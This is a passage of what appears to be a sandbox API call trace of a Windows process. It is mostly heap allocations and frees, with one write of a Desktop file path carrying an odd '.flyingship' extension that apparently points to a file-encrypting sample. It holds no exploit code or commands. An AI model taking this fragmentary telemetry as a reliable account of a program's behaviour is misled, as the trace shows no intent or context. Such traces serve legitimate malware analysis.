hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0076.442] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.442] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\n", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0076.442] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x3d) returned 0x74b5d0 [0076.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\n", cchWideChar=61, lpMultiByteStr=0x74b5d0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 61 [0076.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.442] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0076.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.442] WriteFile (in: hFile=0x140, lpBuffer=0x74b588*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x74b588*, lpNumberOfBytesWritten=0x61eef4*=0x3c, lpOverlapped=0x0) returned 1 [0076.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.443] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.443] CloseHandle (hObject=0x140) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.576] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0076.576] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.576] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.577] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.577] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0076.577] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.577] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.578] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0076.578] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.578] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.578] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.578] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e300 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0076.578] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.578] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.579] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.579] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.580] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.580] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0076.581] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.581] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.581] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.582] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.582] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.583] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.583] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.583] HeapFree (in: 